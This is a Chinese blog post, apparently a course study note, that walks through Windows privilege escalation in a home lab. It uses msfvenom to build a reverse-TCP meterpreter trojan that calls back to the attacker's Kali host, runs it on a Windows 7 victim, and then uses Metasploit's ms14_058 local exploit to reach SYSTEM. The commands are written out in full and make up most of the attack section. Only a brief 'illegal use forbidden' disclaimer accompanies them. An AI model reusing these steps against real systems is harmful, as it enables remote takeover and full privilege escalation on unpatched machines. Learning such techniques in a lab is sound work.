内网渗透 -- 提升权限(利用提权漏洞)

最新推荐文章于 2024-08-18 08:30:00 发布
最新推荐文章于 2024-08-18 08:30:00 发布
阅读量385 收藏
点赞数
分类专栏: 某教程学习笔记 文章标签: web安全 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/107072404
版权

沉默不是没有情绪,是感觉没有再说的意义。。。。

----  网易云热评

环境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.137

 

一、生成木马

1、查看Windows下可利用的payloads

msfvenom -l payloads | grep windows | grep tcp

2、选择windows/meterpreter/reverse_tcp并生成木马

-p 选择一个payload

-l 载荷列表

-f 生成的文件格式

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444 -b"\x00" -f exe > aiyou.exe

3、/root目录下会生成一个aiyou.exe文件

二、通过Metasploit监听小受

1、启动Metasploit,use exploit/multi/handler

2、设置payload,set payload windows/meterpreter/reverse_tcp

3、设置监听,set lhost 192.168.1.133

4、设置监听端口,set lport 4444

5、run

6、将生成的aiyou.exe拷贝到小受中并运行,getuid查看权限,普通用户

 

三、提权漏洞(ms14_058)

1、选择提权漏洞:use exploit/windows/local/ms14_058_track_popup_menu

2、查看需要设置的参数:show options

3、设置session值:set session 1,执行run

4、重新生成一个session,查看权限

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

 

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

web安全工具库
关注
专栏目录
内网渗透测试-提权工具
05-25
内网渗透测试是信息安全领域中的一个重要环节,主要目的是模拟黑客攻击行为,以发现并修复组织内部网络中的安全漏洞。在这个过程中,提权是关键的一环,它指的是在获取了低权限账户后,尝试升级到管理员权限,从而...
渗透工具之msf
热门推荐
zhalang8324的博客
08-17 3万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
可以使任何人获得管理员权限的Windows 10系统漏洞
Candour_0的博客
02-03 571
可以使任何人获得管理员权限的Windows 10系统漏洞
.NET内网提权工具:SharpEfsPotato
最新发布
ahhacker86的专栏
08-18 705
Sharp4EfsPotato 是一款专门设计的工具,用于利用微软加密文件系统远程协议(EFSRPC)中的漏洞进行权限提升。该漏洞允许攻击者在已被入侵的Windows系统获取SYSTEM级别的权限。该工具利用了EFSRPC协议中的漏洞,可以将普通用户权限提升到SYSTEM权限
浅谈MS17-010永恒之蓝漏洞利用(渗透,后渗透)2
m0_70383208的博客
05-28 511
接着上面的成功渗透的结果,我们可以看到一个meterpreter,我们可以输入命令查看当前用户信息 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 接着我们需要使用一个后渗透模块kiwi-后渗透阶段的一款利器. 输入load kiwi //加载kiwi,如下图 接下来我们需要进行进程迁移,先使用ps 查看当前进程 将 SYSTEM 权限 迁移为 Administrator meterpreter > ps
Nmap 渗透实列
煮酒闲谈
08-25 3801
0x00 前言渗透是个持续的过程,不断地搜集信息,整理信息,以及利用信息,最终的目标就是拿到系统乃至整个网络的最高权限。在笔者看来,渗透测试与安全研究的最大不同就是前者擅长利用后者的研究成果并运用到实战之中。今天笔者将继续来分析渗透测试学习笔记系列的第二个案例。 0x01 案例分析实验环境: 目标靶机:10.11.1.0/24 攻击机:Kali Linux (10.11.0.38) 渗透过程:首先,
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
一旦获取一定权限,攻击者会尝试提升权限,如通过漏洞利用提权工具或利用已知的权限漏洞。横向移动涉及在内网中从一台机器迁移到另一台,通常是通过滥用管理员权限或窃取的凭据。 9. **权限维持与免杀**: 攻击...
部分渗透提权文章
04-16
"部分渗透提权文章"的主题聚焦于如何在获取初步访问权限后,进一步提升权限,进行内网渗透,以及在Linux环境下的相关技巧。这里我们将深入探讨XSS(跨站脚本)攻击、社会工程学利用,以及提权的基本概念和实践案例。...
sensitivefilescan-master-内网渗透的工具
07-14
这包括但不限于端口扫描、服务识别、漏洞利用权限提升、敏感数据查找等步骤。内网渗透测试是确保企业信息安全的重要手段,它有助于发现并修复内部网络中的安全漏洞,提高整体防御能力。 根据提供的压缩包子文件名...
毒蛇:metasploit-framework图形界面图形化内网渗透工具
02-01
【毒蛇:Metasploit-Framework图形界面图形化内网渗透工具】 毒蛇,全称为Viper,是一款基于Python开发的Metasploit-Framework的图形界面工具,它为红队和安全研究人员提供了一个友好的界面,用于管理和执行渗透...
内网渗透常用提权方式总结
j1044957016的博客
06-01 7760
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
提权漏洞(Privilege Escalation Vulnerability)
qq_69100706的博客
04-20 668
提权漏洞(Privilege Escalation Vulnerability)是指在一个系统或应用程序中,攻击者能够通过某种方式获得比原本更低级别权限更高的系统或应用程序访问权限。这种漏洞通常存在于操作系统、应用程序或网络服务中,攻击者利用这类漏洞可以突破原有的权限限制,执行未经授权的操作,如读取、修改或删除关键系统文件,操控系统服务,甚至取得系统管理员权限
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1189
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞系统漏洞,服务器漏洞,第三方软件漏洞漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
Web的基本漏洞--提权
尽欢
06-05 576
提权的介绍
漏洞利用提权(一):提权基础
黎先生的博客
02-15 4459
1. 提权概述 1.1 概述 提权顾名思义就是提高自己在系统中的权利。渗透测试以获取系统的最高权限为目标,首先通过寻找漏洞获取WebShell权限,然后进行提权提权可分为: 操作系统提权 Windows Linux Samba Android 应用程序提权 Seru-u Radmin SQL Server 2000/2005、MySQL、Oracle Java IE 例如Wi...
渗透测试提权指南
遇事不决冲冲冲
12-04 7564
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
【kali】29 提权—— 利用漏洞提权
(∪.∪ )...zzz的博客
11-27 8029
这里写自定义目录标题一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限1. Ms011-080 对应补丁 Kb25927992. kali集成了exploit3. 查看.py4. 生成.exe5. 运行exe提权成功二、Win7 使用 Ms14-068 获取 域控制器的权限1.win2003搭建域控制器2. 修改win2003域控制器的用户权限三、利用 CVE-2012-0056 提升 linux 权限 一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限 1. Ms0
权限提升利用Linux漏洞提权
qq_68163788的博客
02-13 2654
Linux漏洞提权是指利用Linux系统中存在的漏洞,通过特定的方法来获取更高的权限。这种方法通常被黑客用来获取系统管理员权限,从而可以对系统进行更深入的攻击和控制。 一种常见的Linux漏洞提权方法是利用内核漏洞。内核是操作系统的核心部分,负责管理系统的资源和提供各种功能。如果内核中存在漏洞,黑客可以利用这些漏洞提升权限。例如,通过利用内核中的缓冲区溢出漏洞,黑客可以在系统中执行恶意代码,并获取更高的权限
内网渗透利用漏洞提权与网络限制破解策略
作者以一次实战案例为背景,首先描述了通过利用CVE-2021-36942漏洞进行提权的过程,这一漏洞利用展示了在初始权限提升后的技术运用。 接下来,作者提到内网的出网限制主要表现为某些设备(如ISA或Bluecoat代理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值